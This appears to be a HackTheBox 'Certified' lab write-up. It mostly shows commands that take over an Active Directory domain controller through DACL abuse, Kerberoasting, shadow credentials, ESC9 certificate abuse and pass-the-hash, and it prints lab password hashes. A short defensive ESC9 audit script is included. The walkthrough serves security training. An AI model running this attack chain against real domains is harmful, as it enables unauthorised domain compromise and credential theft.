HTB-Certified

Box Info

Difficulty Medium
OS Windows
IP Address 10.10.11.41

Credentials

As is common in Windows pentests, you will start the Certified box with credentials for the following account:

judith.mader : judith09

Port Scanning

# Check all open TCP
sudo rustscan 10.10.11.41 -r 1-65535 --ulimit 5000
# Nmap scan with script on open TCP port
sudo nmap 10.10.11.41 -sCV -Pn -sT -p53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49668,49673,49674,49683,49713,49737,61797
# Nmap scan vulnerability
sudo nmap -sT -p53,88,135,139,389,445,464,593,636,3269,3268,5985,9389,49666,49668,49673,49674,49683,49713,49737,61797 --script=vuln -O -Pn 10.10.11.41
# Nmap scan with UDP port
sudo nmap -sU --top-ports 20 -Pn 10.10.11.41

PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-03-11 18:00:52Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-03-11T18:02:20+00:00; +6h42m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49683/tcp open msrpc Microsoft Windows RPC
49713/tcp open msrpc Microsoft Windows RPC
49737/tcp open msrpc Microsoft Windows RPC
61797/tcp open msrpc Microsoft Windows RPC
123/udp open ntp
53/udp open domain
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Update DNS

# Add the DC to /etc/hosts (sudo echo does not write to the file; pipe through sudo tee instead)
echo "10.10.11.41 certified.htb dc01.certified.htb" | sudo tee -a /etc/hosts

Service Enumeration

389/tcp LDAP

Since the box hands us valid credentials from the start, I will use them to collect the AD information with bloodhound-python.

sudo ntpdate 10.10.11.41 && bloodhound-python -u "judith.mader" -p "judith09" -d certified.htb -c All --zip -ns 10.10.11.41

sudo neo4j start
bloodhound


BloodHound shows us the path: start from judith.mader's WriteOwner permission on the MANAGEMENT group, then use the GenericWrite permission over management_svc.

WriteOwner to Management Group

WriteOwner means the user can change the owner of the Management group. Here we use dacledit.py to abuse ownership of the Management group and grant judith.mader the AddMember privilege (WriteMembers in dacledit).

sudo ntpdate 10.10.11.41 && python3.13 ~/Desktop/AD/Impacket/examples/dacledit.py -action 'write' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' "certified.htb"/"judith.mader":"judith09"


Next, read the DACL back to confirm the new ACE for judith.mader.

sudo ntpdate 10.10.11.41 && python3.13 ~/Desktop/AD/Impacket/examples/dacledit.py -action 'read' -rights 'WriteMembers' -principal 'judith.mader' -target-dn 'CN=MANAGEMENT,CN=USERS,DC=CERTIFIED,DC=HTB' "certified.htb"/"judith.mader":"judith09"


Now we can add the user to the MANAGEMENT group with bloodyAD.

source venv/bin/activate
python bloodyAD.py --host "10.10.11.41" -d "Certified.htb" -u "judith.mader" -p "judith09" add groupMember "MANAGEMENT" "judith.mader"


GenericWrite to management_svc

With judith.mader added to MANAGEMENT, BloodHound shows that we can now abuse the GenericWrite privilege over the management_svc service account. GenericWrite grants the ability to write any non-protected attribute on the target object, including the "member" attribute of a group and the SPN of a user.

BloodHound suggests using targetedKerberoast to obtain a crackable service ticket hash for management_svc.

python targetedKerberoast.py -v -d 'Certified.htb' -u 'judith.mader' -p 'judith09'


Having obtained the TGS-REP hash for management_svc, we can try to crack the password with hashcat.

code management_svc.hash
hashcat -m 13100 management_svc.hash /usr/share/wordlists/rockyou.txt

hashcat exhausted the wordlist without a match, so I concluded that cracking is not the intended path.

BloodHound also suggests an alternative: abusing the KeyCredentialLink attribute (shadow credentials) with pywhisker.

https://github.com/ShutdownRepo/pywhisker

python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
sudo ntpdate 10.10.11.41 && python pywhisker.py -d "certified.htb" -u "judith.mader" -p 'judith09' --target "management_svc" --action "add"


  • Troubleshoot insufficient rights

    If pywhisker reports insufficient rights, redo the steps from WriteOwner to Management Group onward, without delay.


  • Troubleshoot OpenSSL.crypto has no attribute ‘PKCS12’

    python3 -m venv venv
    source venv/bin/activate
    pip install pyopenssl==19.1.0


Now we have the PFX certificate and its password. Let's move it to the working directory.

mv *.pfx ~/Desktop/HTB/Season6/Certified

Obtaining TGT

https://github.com/dirkjanm/PKINITtools

Generate a Kerberos TGT for management_svc using the PFX certificate (PKINIT).

python3 -m venv venv
source venv/bin/activate
pip install minikerberos oscrypto impacket pyasn1
python3 gettgtpkinit.py certified.htb/management_svc -cert-pfx ~/Desktop/HTB/Season6/Certified/09iDGE4i.pfx -pfx-pass JeAFPZxXH4uBfNdBwmdv ccache


Recovering NT Hash

Extract the NT hash for management_svc with getnthash.py, using the AS-REP encryption key printed by gettgtpkinit.py (UnPAC-the-hash).

export KRB5CCNAME=./ccache
python3 getnthash.py certified.htb/management_svc -key 5a2818a3d64a96f4cddc3db46eba555deabe7cabc5c77126abb6f33401212fb6


We now have the NT hash of management_svc:

management_svc : a091c1832bcdd4677c28b5a6a1295584

Initiate User Foothold

Validate the management_svc credentials over WinRM:

nxc winrm 10.10.11.41 -u management_svc -d certified.htb -H a091c1832bcdd4677c28b5a6a1295584


evil-winrm -H a091c1832bcdd4677c28b5a6a1295584 -i 10.10.11.41 -u management_svc


Privilege Escalation

GenericAll to ca_operator

From BloodHound we know that management_svc has GenericAll permission over ca_operator.


Here we use Certipy's shadow credentials attack to obtain the NT hash of ca_operator.

https://github.com/ly4k/Certipy

source venv/bin/activate
pip install certipy-ad

certipy shadow auto -username management_svc@certified.htb -hashes :a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -dc-ip 10.10.11.41


This yields the ca_operator NT hash:

ca_operator : 259745cb123a52aa2e693aaacca2db52

ADCS

According to Microsoft's documentation, CA operators manage the CA servers. Therefore, we use certipy to look for vulnerable configurations in the target AD CS service.

certipy find -u 'ca_operator' -hashes 259745cb123a52aa2e693aaacca2db52 -dc-ip 10.10.11.41 -vulnerable -stdout


Update ca_operator UPN to administrator

Certipy reports that the CA is vulnerable to ESC9: ca_operator is allowed to enroll, and the template has the no-security-extension flag set.

https://www.thehacker.recipes/ad/movement/adcs/certificate-templates#no-security-extension-esc9

https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7
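As an added defender-side check, not part of the original write-up: a small Python audit of certificate-template attributes for the three ESC9 preconditions the references above describe (the no-security-extension enrollment flag, an authentication EKU, and a KDC StrongCertificateBindingEnforcement value below 2). The template dicts and the registry value are constructed sample data, and the CertifiedAuthentication attributes are assumed, not captured from the box.

```python
# Added defender-side audit (not from the original write-up): flag certificate
# templates that meet the ESC9 preconditions. Templates are plain dicts as
# exported from LDAP; every sample value below is constructed, not captured.

# msPKI-Enrollment-Flag bit (MS-CRTD): issued certs omit the SID security
# extension, so the KDC falls back to weak UPN/DNS-name mapping.
CT_FLAG_NO_SECURITY_EXTENSION = 0x00080000

# EKUs that make a certificate usable for domain authentication.
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "2.5.29.37.0",             # Any Purpose
}

def esc9_findings(template, strong_binding_enforcement):
    """Return the reasons a template is exposed to ESC9, or [] if it is not.
    strong_binding_enforcement is the KDC registry value
    HKLM\\SYSTEM\\CurrentControlSet\\Services\\Kdc\\StrongCertificateBindingEnforcement
    (0 = disabled, 1 = compatibility mode, 2 = full enforcement).
    """
    reasons = []
    flags = int(template.get("msPKI-Enrollment-Flag", 0))
    if flags & CT_FLAG_NO_SECURITY_EXTENSION:
        reasons.append("msPKI-Enrollment-Flag has CT_FLAG_NO_SECURITY_EXTENSION")
    ekus = set(template.get("pKIExtendedKeyUsage", []))
    if not ekus or ekus & AUTH_EKUS:  # an empty EKU list means any purpose
        reasons.append("template allows client authentication")
    if strong_binding_enforcement != 2:
        reasons.append("StrongCertificateBindingEnforcement is not 2")
    # All three conditions are needed for ESC9; report nothing otherwise.
    return reasons if len(reasons) == 3 else []

def audit(templates, strong_binding_enforcement):
    # Map template name -> ESC9 findings for a whole template export.
    return {t["name"]: esc9_findings(t, strong_binding_enforcement) for t in templates}

# Constructed sample templates (assumed attribute values, not from the box).
TEMPLATES = [
    {"name": "CertifiedAuthentication",
     "msPKI-Enrollment-Flag": CT_FLAG_NO_SECURITY_EXTENSION,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    {"name": "WebServer", "msPKI-Enrollment-Flag": 0,
     "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.1"]},  # Server Authentication only
]

if __name__ == "__main__":
    for name, reasons in audit(TEMPLATES, strong_binding_enforcement=1).items():
        print(f"{name}: {'; '.join(reasons) or 'not exposed to ESC9'}")
```

Setting StrongCertificateBindingEnforcement to 2 on the DCs, or removing the no-security-extension flag from the template, makes the audit report the template as not exposed.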

Now we change the UPN of ca_operator to Administrator.

certipy account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn Administrator


Request a certificate as ca_operator, abusing ESC9:


sudo ntpdate 10.10.11.41 && certipy req -username ca_operator@certified.htb -hashes 259745cb123a52aa2e693aaacca2db52 -target 10.10.11.41 -ca certified-DC01-CA -template CertifiedAuthentication


Restoring Original UPN

certipy-ad account update -u management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -user ca_operator -upn ca_operator@certified.htb


Authenticating with the obtained certificate yields the Administrator's NT hash via UnPAC-the-hash.

certipy auth -pfx 'administrator.pfx' -domain certified.htb


We now have the Administrator NT hash:

aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

Initiate Root Foothold

Validate WinRM access:

nxc winrm 10.10.11.41 -u administrator -d certified.htb -H 0d5b49608bbce1751f708748f67e2d34


evil-winrm -H 0d5b49608bbce1751f708748f67e2d34 -i 10.10.11.41 -u administrator
